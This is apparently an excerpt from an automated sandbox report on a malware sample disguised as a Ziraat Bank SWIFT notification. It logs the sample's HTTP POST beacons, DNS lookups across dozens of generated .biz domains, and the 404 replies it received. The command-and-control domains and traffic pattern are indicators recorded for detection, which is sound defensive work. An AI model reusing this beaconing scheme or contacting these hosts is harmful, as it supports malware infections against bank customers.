Source: global traffic	HTTP traffic detected: POST /hqwogpkl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uppfulbfwwgcmugi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /skptrowoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /prrrrvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gtfcajvqmbnpqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vsgvgssokytrsgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /brcmn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rbppubhsntef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qrwvpmlh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mxrihtviqbtt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sroelgby HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jrqya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sogowygirgwvide HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /akssysyiwejarq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhkjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cncvougpyxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /eo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ooabmbiqikucit HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rghyclqgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nolqdemmkybmoyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /asw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz

Source: unknown

HTTP traffic detected: POST /oqcvpoewhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
